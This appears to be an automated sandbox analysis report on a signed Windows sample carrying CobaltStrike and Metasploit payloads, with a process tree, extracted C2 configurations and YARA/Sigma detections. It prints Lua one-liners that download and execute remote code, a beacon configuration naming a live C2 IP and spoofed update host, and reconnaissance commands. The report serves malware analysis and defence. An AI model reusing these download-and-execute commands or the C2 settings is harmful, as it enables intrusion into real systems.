Play interactive tour

Edit tour

Windows Analysis Report WhQZ6UbCEY

Overview

General Information

Sample Name:	WhQZ6UbCEY (renamed file extension from none to exe)
Analysis ID:	447036
MD5:	76de16ed705561ad6ff55fd578660c91
SHA1:	232af3b6a96ead34c18607a81b5f7af14763195a
SHA256:	75e03f40a088903579a436c0d8e8bc3d0d71cf2942ad793cc948f36866a2e1ad
Tags:	BIOPASSCobaltStrikeexesigned
Infos:
Most interesting Screenshot:

Detection

CobaltStrike Metasploit

Score:	56
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Compliance

Score:	20
Range:	0 - 100

Signatures

Detected unpacking (creates a PE file in dynamic memory)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected CobaltStrike

Yara detected Metasploit Payload

C2 URLs / IPs found in malware configuration

Gathers network related connection and port information

Uses ipconfig to lookup or modify the Windows network settings

Uses netstat to query active network connections and open ports

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to launch a program with higher privileges

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to shutdown / reboot the system

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates COM task schedule object (often to register a task for autostart)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

DLL planting / hijacking vulnerabilities found

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

EXE planting / hijacking vulnerabilities found

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

JA3 SSL client fingerprint seen in connection with other malware

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

PE file contains strange resources

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious WMI Execution

Tries to load missing DLLs

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w10x64

WhQZ6UbCEY.exe (PID: 2328 cmdline: 'C:\Users\user\Desktop\WhQZ6UbCEY.exe' MD5: 76DE16ED705561AD6FF55FD578660C91)

luac.exe (PID: 1384 cmdline: C:\ProgramData\lua\luac.exe -e 'code = \'local http=require('socket.http');\'..\'local response_body = {}\'..\'local res, code = http.request({\'..\' url = string.reverse('aul.344-SC-1/68x/moc.scnuyila.gnokgnoh-nc-sso.sbilaul//:ptth'),\'..\' sink = ltn12.sink.table(response_body)\'..\'})\'..\'if type(response_body) == 'table' then\'..\' loadstring(table.concat(response_body))()\'..\'else\'..\' print('error')\'..\'end\';loadstring(code)();' MD5: B747D97542F2E512AB640D0A67D5DA91)

cmd.exe (PID: 1268 cmdline: C:\Windows\system32\cmd.exe /c netstat -ano|findstr LISTEN|findstr 127.0.0.1: MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

NETSTAT.EXE (PID: 4712 cmdline: netstat -ano MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)

findstr.exe (PID: 4280 cmdline: findstr LISTEN MD5: 8B534A7FC0630DE41BB1F98C882C19EC)

findstr.exe (PID: 4020 cmdline: findstr 127.0.0.1: MD5: 8B534A7FC0630DE41BB1F98C882C19EC)

cmd.exe (PID: 6188 cmdline: C:\Windows\system32\cmd.exe /c netstat -ano|findstr LISTEN|findstr 127.0.0.1: MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

NETSTAT.EXE (PID: 6260 cmdline: netstat -ano MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)

findstr.exe (PID: 6284 cmdline: findstr LISTEN MD5: 8B534A7FC0630DE41BB1F98C882C19EC)

findstr.exe (PID: 6308 cmdline: findstr 127.0.0.1: MD5: 8B534A7FC0630DE41BB1F98C882C19EC)

cmd.exe (PID: 6416 cmdline: C:\Windows\system32\cmd.exe /C WMIC /namespace:\\root\securitycenter2 path antivirusproduct GET displayName && WMIC os get caption && ipconfig /all MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

WMIC.exe (PID: 6580 cmdline: WMIC /namespace:\\root\securitycenter2 path antivirusproduct GET displayName MD5: 79A01FCD1C8166C5642F37D1E0FB7BA8)

WMIC.exe (PID: 6748 cmdline: WMIC os get caption MD5: 79A01FCD1C8166C5642F37D1E0FB7BA8)

ipconfig.exe (PID: 6908 cmdline: ipconfig /all MD5: B0C7423D02A007461C850CD0DFE09318)

cmd.exe (PID: 7092 cmdline: C:\Windows\system32\cmd.exe /C WMIC /namespace:\\root\securitycenter2 path antivirusproduct GET displayName && WMIC os get caption && ipconfig /all MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 7156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

WMIC.exe (PID: 6336 cmdline: WMIC /namespace:\\root\securitycenter2 path antivirusproduct GET displayName MD5: 79A01FCD1C8166C5642F37D1E0FB7BA8)

WMIC.exe (PID: 6360 cmdline: WMIC os get caption MD5: 79A01FCD1C8166C5642F37D1E0FB7BA8)

cmd.exe (PID: 6484 cmdline: C:\Windows\system32\cmd.exe /C %ProgramData%\lua\lua.exe -e 'local code = [[local http = require('socket.http');local response_body = {};local res, code = http.request({url = 'http://lualibs.oss-cn-hongkong.aliyuncs.com/x86/Schedule.lua',sink = ltn12.sink.table(response_body)});if type(response_body) == 'table' then loadstring(table.concat(response_body))() else print('error') end;]];loadstring(code)();' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 4772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

lua.exe (PID: 4652 cmdline: C:\ProgramData\lua\lua.exe -e 'local code = [[local http = require('socket.http');local response_body = {};local res, code = http.request({url = 'http://lualibs.oss-cn-hongkong.aliyuncs.com/x86/Schedule.lua',sink = ltn12.sink.table(response_body)});if type(response_body) == 'table' then loadstring(table.concat(response_body))() else print('error') end;]];loadstring(code)();' MD5: 847B0D65C80A8E777E8AA108295C0B95)

cmd.exe (PID: 6984 cmdline: C:\Windows\system32\cmd.exe /c netstat -ano|findstr LISTEN|findstr 127.0.0.1: MD5: F3BDBE3BB6F734E357235F4D5898582D)

NETSTAT.EXE (PID: 7024 cmdline: netstat -ano MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)

findstr.exe (PID: 7136 cmdline: findstr LISTEN MD5: 8B534A7FC0630DE41BB1F98C882C19EC)

findstr.exe (PID: 5436 cmdline: findstr 127.0.0.1: MD5: 8B534A7FC0630DE41BB1F98C882C19EC)

Silverlight.exe (PID: 2484 cmdline: C:\Users\user\AppData\Roaming\Silverlight.exe MD5: 7BAEBABAB6F0CA7B143068FDC17DFA41)

install.exe (PID: 4064 cmdline: c:\5a70dbc53fcf0baade86ff\install.exe MD5: B8A93D5A9BCFC67393584CA0DE0D3FC9)

microsoft_defaults.exe (PID: 6452 cmdline: 'C:\5a70dbc53fcf0baade86ff\microsoft_defaults.exe' dhp=true dsp=true MD5: 64CADAEF6DCF7B6A6171FC1A2BEE94A1)

rundll32.exe (PID: 7044 cmdline: 'C:\Windows\System32\rundll32.exe' 'C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\SLMSPRBootstrap.dll',SetupPlayReadyData MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

coregen.exe (PID: 5844 cmdline: 'C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\coregen.exe' mscorlib.dll MD5: 3BF709AEDF5042C39515756FB72E9EC0)

conhost.exe (PID: 6088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

Silverlight.Configuration.exe (PID: 4604 cmdline: 'C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\silverlight.configuration.exe' -enableMU MD5: 17E40315660830AA625483BBF608730C)

MSIE4C1.tmp (PID: 6900 cmdline: 'C:\Windows\Installer\MSIE4C1.tmp' flat MD5: 015F2D65BE1227973565EB9E3E9C631A)

msiexec.exe (PID: 6964 cmdline: c:\Windows\syswow64\MsiExec.exe -Embedding D8799928554D1158D35383D418369414 MD5: 12C17B5A5C2A7B97342C362CA467E9A2)

cleanup

Malware Configuration

Threatname: Metasploit

{"Headers": "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 QIHU 360EE\r\nHost: windows.qh-microsoft-update.com\r\n", "Type": "Metasploit Download", "URL": "http://45.154.13.94/F8JD2R"}

Threatname: CobaltStrike

{"BeaconType": ["HTTPS"], "Port": 443, "SleepTime": 1000, "MaxGetSize": 1398104, "Jitter": 10, "MaxDNS": 235, "C2Server": "45.154.13.94,/updates", "UserAgent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 QIHU 360EE", "HttpPostUri": "/windowsxp/updcheck.php", "Malleable_C2_Instructions": ["Base64 decode"], "HttpGet_Metadata": ["user=", "Cookie"], "HttpPost_Metadata": ["Accept: text/plain", "Accept-Language: en-us", "Accept-Encoding: text/plain", "Content-Type: application/x-www-form-urlfackfackd", "id", "&op=1&id=vxeykS&ui=Josh @ PC&wv=11&gr=backoff&bv=1.55&data="], "SpawnTo": "AAAAAAAAAAAAAAAAAAAAAA==", "PipeName": "", "DNS_Idle": "8.8.4.4", "DNS_Sleep": 0, "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\rundll32.exe", "Spawnto_x64": "%windir%\\sysnative\\rundll32.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 305419896, "bStageCleanup": "False", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "True", "bProcInject_UseRWX": "True", "bProcInject_MinAllocSize": 0, "ProcInject_PrependAppend_x86": "Empty", "ProcInject_PrependAppend_x64": "Empty", "ProcInject_Execute": ["CreateThread", "SetThreadContext", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "VirtualAllocEx", "bUsesCookies": "True", "HostHeader": "Host: windows.qh-microsoft-update.com\r\n"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.482412566.000000000048A000.00000004.00000020.sdmp	Cobaltbaltstrike_RAW_Payload_https_stager_x86	Detects CobaltStrike payloads	Avast Threat Intel Team	0x2b341:$h01: FC E8 89 00 00 00 60 89 E5 31 D2 64 8B 52 30 8B 52 0C 8B 52 14 8B 72 28
00000003.00000002.482412566.000000000048A000.00000004.00000020.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
00000003.00000002.485998444.0000000000890000.00000004.00000001.sdmp	Cobaltbaltstrike_RAW_Payload_https_stager_x86	Detects CobaltStrike payloads	Avast Threat Intel Team	0x373a8:$h01: FC E8 89 00 00 00 60 89 E5 31 D2 64 8B 52 30 8B 52 0C 8B 52 14 8B 72 28
00000003.00000002.485998444.0000000000890000.00000004.00000001.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
00000003.00000002.487308738.0000000000A50000.00000040.00000001.sdmp	Cobaltbaltstrike_RAW_Payload_https_stager_x86	Detects CobaltStrike payloads	Avast Threat Intel Team	0x0:$h01: FC E8 89 00 00 00 60 89 E5 31 D2 64 8B 52 30 8B 52 0C 8B 52 14 8B 72 28
00000003.00000002.487308738.0000000000A50000.00000040.00000001.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
00000003.00000002.491261145.0000000001E80000.00000040.00000001.sdmp	HKTL_Meterpreter_inMemory	Detects Meterpreter in-memory	netbiosX, Florian Roth	0x2f858:$xs1: WS2_32.dll 0x2fd3e:$xs2: ReflectiveLoader
00000003.00000002.491261145.0000000001E80000.00000040.00000001.sdmp	CobaltStrike_Sleep_Decoder_Indicator	Detects CobaltStrike sleep_mask decoder	yara@s3c.za.net	0x429e:$sleep_decoder: 8B 07 8B 57 04 83 C7 08 85 C0 75 2C
00000003.00000002.491261145.0000000001E80000.00000040.00000001.sdmp	CobaltStrike_Unmodifed_Beacon	Detects unmodified CobaltStrike beacon DLL	yara@s3c.za.net	0x2fd3e:$loader_export: ReflectiveLoader 0x2fd32:$exportname: beacon.dll
00000003.00000002.491261145.0000000001E80000.00000040.00000001.sdmp	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
00000003.00000002.492478828.0000000001FA0000.00000004.00000040.sdmp	CobaltStrike_C2_Decoded_Config_Indicator	Detects CobaltStrike C2 decoded profile configuration	yara@s3c.za.net	0x858:$c2_dec_config: 01 00 00 00 08 00 00 00 01 00 00 00 BB 01 00 00 02 00 00 00 E8 03 00 00 02 00 00 00 58 55 15 00 ...
00000003.00000002.486483728.00000000008EC000.00000004.00000001.sdmp	Cobaltbaltstrike_RAW_Payload_https_stager_x86	Detects CobaltStrike payloads	Avast Threat Intel Team	0x22d0:$h01: FC E8 89 00 00 00 60 89 E5 31 D2 64 8B 52 30 8B 52 0C 8B 52 14 8B 72 28
00000003.00000002.486483728.00000000008EC000.00000004.00000001.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
00000003.00000002.493743865.0000000002460000.00000040.00000001.sdmp	HKTL_Meterpreter_inMemory	Detects Meterpreter in-memory	netbiosX, Florian Roth	0x2e89c:$xs1: WS2_32.dll 0x2ed82:$xs2: ReflectiveLoader
00000003.00000002.493743865.0000000002460000.00000040.00000001.sdmp	Cobaltbaltstrike_Beacon_x86	Detects CobaltStrike payloads	Avast Threat Intel Team	0x44:$h01: 4D 5A E8 00 00 00 00 5B 89 DF 52 45 55 89 E5 81 C3 50 81 00 00 FF D3 68 0x2fe64:$h13: 2E 2F 2E 2F 2E 2C 2E 26 2E 2C 2E 2F 2E 2C 2F 95 2E
00000003.00000002.493743865.0000000002460000.00000040.00000001.sdmp	CobaltStrike_Sleep_Decoder_Indicator	Detects CobaltStrike sleep_mask decoder	yara@s3c.za.net	0x36e2:$sleep_decoder: 8B 07 8B 57 04 83 C7 08 85 C0 75 2C
00000003.00000002.493743865.0000000002460000.00000040.00000001.sdmp	CobaltStrike_Unmodifed_Beacon	Detects unmodified CobaltStrike beacon DLL	yara@s3c.za.net	0x2ed82:$loader_export: ReflectiveLoader 0x2ed76:$exportname: beacon.dll
00000003.00000002.493743865.0000000002460000.00000040.00000001.sdmp	SUSP_XORed_Mozilla	Detects suspicious XORed keyword - Mozilla/5.0	Florian Roth	0x300aa:$xo1: cATGBBO\x01\x1B\x1E
00000003.00000002.493743865.0000000002460000.00000040.00000001.sdmp	JoeSecurity_CobaltStrike_2	Yara detected CobaltStrike	Joe Security
00000003.00000002.493743865.0000000002460000.00000040.00000001.sdmp	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
Click to see the 15 entries

Sigma Overview

System Summary:

Sigma detected: Suspicious WMI Execution

Show sources

Source: Process started

Author: Michael Haag, Florian Roth, juju4, oscd.community: Data: Command: WMIC /namespace:\\root\securitycenter2 path antivirusproduct GET displayName , CommandLine: WMIC /namespace:\\root\securitycenter2 path antivirusproduct GET displayName , CommandLine|base64offset|contains: X, Image: C:\Windows\SysWOW64\wbem\WMIC.exe, NewProcessName: C:\Windows\SysWOW64\wbem\WMIC.exe, OriginalFileName: C:\Windows\SysWOW64\wbem\WMIC.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /C WMIC /namespace:\\root\securitycenter2 path antivirusproduct GET displayName && WMIC os get caption && ipconfig /all, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6416, ProcessCommandLine: WMIC /namespace:\\root\securitycenter2 path antivirusproduct GET displayName , ProcessId: 6580

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000003.00000002.485998444.0000000000890000.00000004.00000001.sdmp	Malware Configuration Extractor: Metasploit {"Headers": "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 QIHU 360EE\r\nHost: windows.qh-microsoft-update.com\r\n", "Type": "Metasploit Download", "URL": "http://45.154.13.94/F8JD2R"}
Source: 00000003.00000002.493743865.0000000002460000.00000040.00000001.sdmp	Malware Configuration Extractor: CobaltStrike {"BeaconType": ["HTTPS"], "Port": 443, "SleepTime": 1000, "MaxGetSize": 1398104, "Jitter": 10, "MaxDNS": 235, "C2Server": "45.154.13.94,/updates", "UserAgent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 QIHU 360EE", "HttpPostUri": "/windowsxp/updcheck.php", "Malleable_C2_Instructions": ["Base64 decode"], "HttpGet_Metadata": ["user=", "Cookie"], "HttpPost_Metadata": ["Accept: text/plain", "Accept-Language: en-us", "Accept-Encoding: text/plain", "Content-Type: application/x-www-form-urlfackfackd", "id", "&op=1&id=vxeykS&ui=Josh @ PC&wv=11&gr=backoff&bv=1.55&data="], "SpawnTo": "AAAAAAAAAAAAAAAAAAAAAA==", "PipeName": "", "DNS_Idle": "8.8.4.4", "DNS_Sleep": 0, "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\rundll32.exe", "Spawnto_x64": "%windir%\\sysnative\\rundll32.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 305419896, "bStageCleanup": "False", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "True", "bProcInject_UseRWX": "True", "bProcInject_MinAllocSize": 0, "ProcInject_PrependAppend_x86": "Empty", "ProcInject_PrependAppend_x64": "Empty", "ProcInject_Execute": ["CreateThread", "SetThreadContext", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "VirtualAllocEx", "bUsesCookies": "True", "HostHeader": "Host: windows.qh-microsoft-update.com\r\n"}

Multi AV Scanner detection for submitted file

Show sources

Source: WhQZ6UbCEY.exe	Metadefender: Detection: 17%			Perma Link
Source: WhQZ6UbCEY.exe	ReversingLabs: Detection: 30%

Cryptography:

Source: C:\Users\user\AppData\Roaming\Silverlight.exe	Code function: 6_2_01004B0F InitializeSecurityDescriptor,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,GetCurrentDirectoryA,GetSystemDirectoryA,QueryDosDeviceA,_strlwr,strstr,strstr,strstr,GetDiskFreeSpaceA,CryptAcquireContextA,sprintf,CryptGenRandom,sprintf,sprintf,CryptReleaseContext,GetSystemTime,SystemTimeToFileTime,DialogBoxParamA,DosDateTimeToFileTime,LocalFileTimeToFileTime,SetFileTime,FindCloseChangeNotification,SendDlgItemMessageA,MoveFileExA,strstr,_stricmp,SendDlgItemMessageA,CreateFileA,GetLastError,CreateFileA,SetFilePointer,SetFilePointer,SetEndOfFile,SetFilePointer,CreateFileA,InitializeCriticalSectionAndSpinCount,#17,GetProcessHeap,CreateEventA,CreateEventA,CreateEventA,CreateThread,WaitForSingleObject,SendDlgItemMessageA,Sleep,ShowWindow,SetParent,SendDlgItemMessageA,SendDlgItemMessageA,SendDlgItemMessageA,ShowWindow,LoadStringA,LoadStringA,SendDlgItemMessageA,SendDlgItemMessageA,SendDlgItemMessageA,SendDlgItemMessageA,SendDlgItemMessageA,ShowWindow,CreateFileA,GetFileSize,ReadFile,CloseHandle,DeleteFileA,SendDlgItemMessageA,SetEnvironmentVariableA,SetEnvironmentVariableA,CreateProcessA,ShowWindow,WaitForSingleObject,GetExitCodeProcess,CloseHandle,ShowWindow,LoadStringA,MessageBoxA,DeleteCriticalSection,ExitProcess,	6_2_01004B0F
Source: C:\Users\user\AppData\Roaming\Silverlight.exe	Code function: 6_2_0100428F GetFileAttributesA,LoadLibraryA,GetProcAddress,DecryptFileA,GetLastError,	6_2_0100428F
Source: C:\Users\user\AppData\Roaming\Silverlight.exe	Code function: 6_2_01004B0F InitializeSecurityDescriptor,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,GetCurrentDirectoryA,GetSystemDirectoryA,QueryDosDeviceA,_strlwr,strstr,strstr,strstr,GetDiskFreeSpaceA,CryptAcquireContextA,sprintf,CryptGenRandom,sprintf,sprintf,CryptReleaseContext,GetSystemTime,SystemTimeToFileTime,DialogBoxParamA,DosDateTimeToFileTime,LocalFileTimeToFileTime,SetFileTime,FindCloseChangeNotification,SendDlgItemMessageA,MoveFileExA,strstr,_stricmp,SendDlgItemMessageA,CreateFileA,GetLastError,CreateFileA,SetFilePointer,SetFilePointer,SetEndOfFile,SetFilePointer,CreateFileA,InitializeCriticalSectionAndSpinCount,#17,GetProcessHeap,CreateEventA,CreateEventA,CreateEventA,CreateThread,WaitForSingleObject,SendDlgItemMessageA,Sleep,ShowWindow,SetParent,SendDlgItemMessageA,SendDlgItemMessageA,SendDlgItemMessageA,ShowWindow,LoadStringA,LoadStringA,SendDlgItemMessageA,SendDlgItemMessageA,SendDlgItemMessageA,SendDlgItemMessageA,SendDlgItemMessageA,ShowWindow,CreateFileA,GetFileSize,ReadFile,CloseHandle,DeleteFileA,SendDlgItemMessageA,SetEnvironmentVariableA,SetEnvironmentVariableA,CreateProcessA,ShowWindow,WaitForSingleObject,GetExitCodeProcess,CloseHandle,ShowWindow,LoadStringA,MessageBoxA,DeleteCriticalSection,ExitProcess,	6_2_01004B0F
Source: C:\5a70dbc53fcf0baade86ff\microsoft_defaults.exe	Code function: 19_2_00223CD0 CryptQueryObject,CryptMsgGetAndVerifySigner,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,	19_2_00223CD0
Source: C:\5a70dbc53fcf0baade86ff\microsoft_defaults.exe	Code function: 19_2_00223980 CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,CryptMsgGetParam,LocalFree,LocalFree,LocalFree,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,GetLastError,	19_2_00223980
Source: C:\5a70dbc53fcf0baade86ff\microsoft_defaults.exe	Code function: 19_2_00223AB0 CertGetCertificateChain,CertVerifyCertificateChainPolicy,CryptHashPublicKeyInfo,CertFreeCertificateChain,CertFreeCertificateChain,CertFreeCertificateChain,GetLastError,CertFreeCertificateChain,GetLastError,	19_2_00223AB0
Source: C:\5a70dbc53fcf0baade86ff\microsoft_defaults.exe	Code function: 19_2_00223870 lstrcmpA,CryptDecodeObject,FileTimeToLocalFileTime,GetLastError,	19_2_00223870
Source: C:\5a70dbc53fcf0baade86ff\microsoft_defaults.exe	Code function: 19_2_00223710 CryptMsgGetParam,lstrcmpA,CryptDecodeObject,LocalAlloc,CryptDecodeObject,LocalFree,GetLastError,	19_2_00223710
Source: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\Silverlight.Configuration.exe	Code function: 36_2_00CEC950 CryptAcquireContextW,CryptGenRandom,SysAllocStringLen,__aulldiv,__aulldiv,__aulldiv,__aulldiv,__aulldiv,__aulldiv,__aulldiv,__aulldiv,CryptReleaseContext,	36_2_00CEC950
Source: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\Silverlight.Configuration.exe	Code function: 36_2_00CEC700 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,	36_2_00CEC700

Privilege Escalation:

Source: C:\Users\user\AppData\Roaming\Silverlight.exe	DLL: wkscli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Silverlight.exe	DLL: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	DLL: bcrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	DLL: Secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	DLL: SSPICLI.DLL	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Silverlight.exe	DLL: cscapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Silverlight.exe	DLL: DNSAPI.dll	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	DLL: CRYPTBASE.DLL	Jump to behavior

Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe

EXE: C:\Users\user\AppData\Roaming\Silverlight.exe

Jump to behavior

Compliance:

Detected unpacking (creates a PE file in dynamic memory)

Show sources

Source: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\coregen.exe

Unpacked PE file: 31.2.coregen.exe.2450000.1.unpack

DLL planting / hijacking vulnerabilities found

Show sources

Source: C:\Users\user\AppData\Roaming\Silverlight.exe	DLL: wkscli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Silverlight.exe	DLL: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	DLL: bcrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	DLL: Secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	DLL: SSPICLI.DLL	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Silverlight.exe	DLL: cscapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Silverlight.exe	DLL: DNSAPI.dll	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	DLL: CRYPTBASE.DLL	Jump to behavior

EXE planting / hijacking vulnerabilities found

Show sources

Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe

EXE: C:\Users\user\AppData\Roaming\Silverlight.exe

Jump to behavior

Found installer window with terms and condition text

Show sources

Source: C:\5a70dbc53fcf0baade86ff\install.exe	Window detected: Install SilverlightBy clicking Install now you accept the Silverlight license agreement.EULA LEGAL LINKView the Silverlight License AgreementEULA PRIVACY TEXTSilverlight updates automatically.EULA PRIVACY LINKView the Silverlight Privacy StatementMake Bing my search engineMake MSN my homepage*Applies to Internet Explorer Firefox Chrome and SafariMicrosoft Service AgreementPrivacy PolicyInstall nowx
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Window detected: Install SilverlightBy clicking Install now you accept the Silverlight license agreement.EULA LEGAL LINKView the Silverlight License AgreementEULA PRIVACY TEXTSilverlight updates automatically.EULA PRIVACY LINKView the Silverlight Privacy StatementMake Bing my search engineMake MSN my homepage*Applies to Internet Explorer Firefox Chrome and SafariMicrosoft Service AgreementPrivacy PolicyInstall nowx

Creates license or readme file

Show sources

Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\adodbapi\license.txt
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\adodbapi\readme.txt
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\isapi\README.txt
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\isapi\samples\README.txt
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\isapi\test\README.txt

PE / OLE file has a valid certificate

Show sources

Source: WhQZ6UbCEY.exe

Static PE information: certificate valid

Uses new MSVCR Dlls

Show sources

Source: C:\ProgramData\lua\luac.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll

Jump to behavior

Uses secure TLS version for HTTPS connections

Show sources

Source: unknown

HTTPS traffic detected: 45.154.13.94:443 -> 192.168.2.3:49724 version: TLS 1.2

Contains modern PE file flags such as dynamic base (ASLR) or NX

Show sources

Source: WhQZ6UbCEY.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA

Binary contains paths to debug symbols

Show sources

Source:	Binary string: f:\dd\xcp\Silverlight\Desktop_RET\InstallWAVE2-7zip.pdb source: Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe
Source:	Binary string: C:\Personal\Temp\BingShareQID\Defaults\Applications\UniversalInstaller_Lite\Release\Microsoft_Defaults.pdb source: Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, microsoft_defaults.exe, 00000013.00000002.255409971.0000000000230000.00000002.00020000.sdmp
